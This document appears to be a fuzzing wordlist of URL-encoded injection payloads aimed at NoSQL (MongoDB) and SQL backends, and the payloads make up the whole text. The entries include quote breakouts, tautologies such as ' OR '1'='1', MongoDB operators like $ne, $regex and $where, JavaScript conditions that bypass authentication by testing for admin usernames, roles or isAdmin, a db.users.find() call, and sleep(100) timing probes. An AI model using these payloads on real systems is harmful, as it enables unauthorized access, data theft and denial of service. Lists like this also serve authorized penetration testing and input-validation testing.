%27
%22
%27%27
%22%22
%27%20OR%20%271%27%3D%271
%22%20OR%20%221%22%3D%221
%27%20AND%20%271%27%3D%271
%22%20AND%20%221%22%3D%221
%27%20%7C%7C%20%271%27%3D%271
%22%20%7C%7C%20%221%22%3D%221
%27%20%26%26%20%271%27%3D%271
%22%20%26%26%20%221%22%3D%221
%27-- 
%22--
%27%23
%22%23
%27%2F%2F
%22%2F%2F
%27%20%24ne%20%27%27
%22%20%24ne%20%22%22
%27%20%24gt%20%27%27
%22%20%24gt%20%22%22
%27%20%24regex%20.%2A
%22%20%24regex%20.%2A
%27%20%24in%20%5B%27a%27%5D
%22%20%24in%20%5B%22a%22%5D
%27%20%24nin%20%5B%27%27%5D
%22%20%24nin%20%5B%22%22%5D
%27%20%24exists%20true
%22%20%24exists%20true
%27%20%24type%20%22string%22
%22%20%24type%20%22string%22
%27%5B%5D
%22%5B%5D
%27%7B%7D
%22%7B%7D
%27)%28
%22)%28
%27%20%24where%20%221%3D1%22
%22%20%24where%20%221%3D1%22
%27%20%24or%20%5B%7B%27a%27%3A%271%27%7D%5D
%22%20%24or%20%5B%7B%22a%22%3A%221%22%7D%5D
%27%20%24and%20%5B%7B%27a%27%3A%271%27%7D%5D
%22%20%24and%20%5B%7B%22a%22%3A%221%22%7D%5D
%27%20%24not%20%7B%27a%27%3A%271%27%7D
%22%20%24not%20%7B%22a%22%3A%221%22%7D
%27null%27
%22null%22
%27true%27
%22true%22
%27false%27
%22false%22
%27%20%7C%7C%20this.username%3D%3D%27admin%27
%22%20%7C%7C%20this.username%3D%3D%22admin%22
%27%20%26%26%20this.password%3D%3D%27admin%27
%22%20%26%26%20this.password%3D%3D%22admin%22
%27%20%7C%7C%20this.role%3D%3D%27admin%27
%22%20%7C%7C%20this.role%3D%3D%22admin%22
%27%20%26%26%20this.role%21%3D%27guest%27
%22%20%26%26%20this.role%21%3D%22guest%22
%27%20%7C%7C%20%27a%27%3D%3D%27a%27
%22%20%7C%7C%20%22a%22%3D%3D%22a%22
%27%20%26%26%20%27a%27%3D%3D%27a%27
%22%20%26%26%20%22a%22%3D%3D%22a%22
%27%20%7C%7C%20true
%22%20%7C%7C%20true
%27%20%26%26%20false
%22%20%26%26%20false
%27%20%7C%7C%20this.password
%22%20%7C%7C%20this.password
%27%20%26%26%20this.username
%22%20%26%26%20this.username
%27%20%7C%7C%20db.users.find%28%29
%22%20%7C%7C%20db.users.find%28%29
%27%20%26%26%20db.users.find%28%29
%22%20%26%26%20db.users.find%28%29
%27%20%7C%7C%20sleep%28100%29
%22%20%7C%7C%20sleep%28100%29
%27%20%26%26%20sleep%28100%29
%22%20%26%26%20sleep%28100%29
%27abc%27%20%7C%7C%20%271%27%3D%271
%22abc%22%20%7C%7C%20%221%22%3D%221
%27xyz%27%20%26%26%20%271%27%3D%271
%22xyz%22%20%26%26%20%221%22%3D%221
%27%20%7C%7C%20this.email%21%3D%27%27
%22%20%7C%7C%20this.email%21%3D%22%22
%27%20%26%26%20this.email%3D%3D%27admin%40test.com%27
%22%20%26%26%20this.email%3D%3D%22admin%40test.com%22
%27%20%7C%7C%20%27123%27%3D%3D%27123%27
%22%20%7C%7C%20%22123%22%3D%3D%22123%22
%27%20%26%26%20%27123%27%3D%3D%27123%27
%22%20%26%26%20%22123%22%3D%3D%22123%22
%27%20%7C%7C%20this.isAdmin
%22%20%7C%7C%20this.isAdmin
%27%20%26%26%20this.isAdmin
%22%20%26%26%20this.isAdmin

